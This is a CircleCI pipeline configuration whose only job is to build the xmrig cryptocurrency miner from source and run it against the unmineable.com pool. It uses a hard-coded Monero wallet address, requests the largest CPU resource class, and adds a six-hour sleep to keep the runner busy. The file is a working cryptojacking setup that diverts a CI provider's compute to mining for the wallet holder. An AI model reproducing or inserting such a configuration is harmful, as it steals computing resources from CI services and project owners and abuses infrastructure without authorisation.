version: 2.1

jobs:
  build-and-run:
    docker:
      - image: ubuntu:latest
        environment:
          DOCKER_BUILDKIT: 1
    steps:
      - checkout

      - run:
          name: Update and Install Dependencies
          command: |
            apt-get update && \
            apt-get install -y git build-essential cmake libuv1-dev libssl-dev libhwloc-dev

      - run:
          name: Build xmrig
          command: |
            git clone https://github.com/xmrig/xmrig.git && \
            cd xmrig && \
            mkdir build && \
            cd build && \
            cmake .. && \
            make

      - run:
          name: Run xmrig
          command: |
            ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:88ShoRuQAns2zfCrQWqC9M6bBjCCBf4xs7TNyXDK3iHsdkQTRaK75MNUxqzw4X62bwF2ik6HwBeJeNdsTTy98MUnS9Q4Rmp.unmineable_worker_tsjcm#mvbs-zlx7 -p x

      - run:
          name: Wait for 6 hours
          command: |
            echo "Waiting for 6 hours..."
            sleep 21600  # Sleep for 6 hours (21600 seconds)

workflows:
  version: 2
  build:
    jobs:
      - build-and-run:
          resource_class: large  # Maximum CPU resources
          
